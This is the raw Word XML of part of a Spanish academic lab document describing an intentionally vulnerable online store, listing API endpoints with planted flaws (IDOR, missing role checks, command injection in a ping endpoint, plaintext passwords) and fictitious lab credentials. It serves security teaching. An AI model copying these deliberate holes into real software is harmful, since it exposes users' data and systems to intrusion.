              <w:t>limiting</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> ni bloqueo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="6AB6A229" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr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904F3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POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="379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7FE153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/api/carrito/{cartId}/agregar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="43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42185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sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Agrega cantidad sin controles de stock.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="68E95756" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134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77FD99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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3798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48CD58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/api/carrito/{cartId}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4309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FA7F10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sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Carrito no asociado a identidad verificada.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="15100152" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr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C865DE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POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="379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F8D781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/api/pedidos/checkout/{cartId}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="43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70523E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sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Genera pedido desde un carrito predecible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="7A522BFA" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134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0F76BD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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3798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4B033B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/api/pedidos/{id}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4309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7CEB7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Consulta vulnerable a IDOR.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="4198A9A7" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr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6E0C6F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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="379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DFC67B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/api/admin/usuarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="43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CE3373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sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Lista usuarios sin comprobar rol.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="49021FE5" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134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B15492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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3798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0623E7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/api/admin/reportes/ping?host=</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4309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9C3DF8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Command injection / RCE </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>controlado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="718E74FF" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="012B4E8E" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="10" w:space="1" w:color="20385F"/>
        </w:pBdr>
        <w:spacing w:before="180" w:after="80"/>
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Descripción técnica del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>frontend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> y la base de datos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7571510F" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="120" w:after="80"/>
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">7.1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Frontend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="173FA47D" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">El </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>frontend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> está compuesto por páginas HTML independientes, una hoja de estilos y módulos JavaScript. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> lo sirve como contenido estático y reenvía las rutas /api y /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>actua</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>tor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> al </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>backend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">. El cliente almacena el JWT y construye peticiones con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>fetch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">). La seguridad no debe depender del navegador; las validaciones del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>frontend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> pueden modificarse o evitarse.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839"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="19D0A013" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2038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960DF9" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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lastRenderedPageBreak/>
              <w:t>Archivo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5839" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2038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2FCFF" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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Función</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="205CA3CB" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr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99BFC8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index.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="58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5F556A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Catálogo y buscador.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="392E31AB" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402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0465F6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 xml:space="preserve">login.html / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>registro.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5839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C83F38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Autenticación y registro.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="61528620" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr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343D4C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producto.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="58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204DB9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Detalle de producto.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="338A97D1" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402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F06440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carrito.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5839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42B0EE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Carrito de compras.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="15812938" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr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EF0258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pedido.html / pedidos.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="58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39C681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sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Detalle e historial de pedidos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="3BD090C2" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402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7019E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admin.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5839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A5CDAF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sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Panel administrativo y diagnóstico de red.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="619AF56E" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr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4E48AE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js</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/config.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="58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470BC3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sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">Selecciona /api detrás de </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Nginx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> o 127.0.0.1:8080/api en desarrollo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="430C678E" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402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C662A4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js</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/api.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5839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C2F3B7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Cliente HTTP centralizado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="482C2802" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr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ED95A4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js/pages/*.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="58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92935D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sz w:val="17"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Lógica específica de cada página.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6107AAAB" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E2B4912" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="120" w:after="80"/>
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>7.2 Base de datos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9F2768" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL se inicializa con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>schema.sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>data.sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">. El proyecto también </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">incluye </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>init.sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> y backup-v1.sql para entregar la estructura y los datos. La tabla usuarios conserva </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>passwords</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> en texto plano a propósito. Los datos semilla incluyen pedidos de usuarios distintos para la prueba IDOR.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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="48CD4AC2" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C6CCD5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7A1F7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Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>backend/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/main/resources/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>db</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>schema.sq</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>l</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>backend/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/main/resources/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>db</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>data.sql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>database/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>init.sql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>database/backup-v1.sql</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="06B9E001" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23D32C94" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="10" w:space="1" w:color="20385F"/>
        </w:pBdr>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t>8. Datos y credenciales de laboratorio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990"/>
        <w:gridCol w:w="99"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="041A7B0A" w14:textId="77777777">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="99" w:type="dxa"/>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="8A5A00"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil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61F5AA" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:b/>
                <w:color w:val="8A5A00"/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">Uso académico: </w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">Estas credenciales son ficticias y existen exclusivamente para el laboratorio local. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">No </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>deben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reutilizarse</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> en </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>otros sistemas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="36B65DE1" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/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6EEE0EA" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E238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20385F"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Usuarios de prueba</w:t>
            </w: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482"/>
              <w:gridCol w:w="1486"/>
              <w:gridCol w:w="1477"/>
            </w:tblGrid>
            <w:tr w:rsidR="00217A21" w14:paraId="6DC6B5A7" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1512" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="20385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</w:tcPr>
                <w:p w14:paraId="15371FEA" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
                  <w:pPr>
                    <w:spacing w:after="0"/>
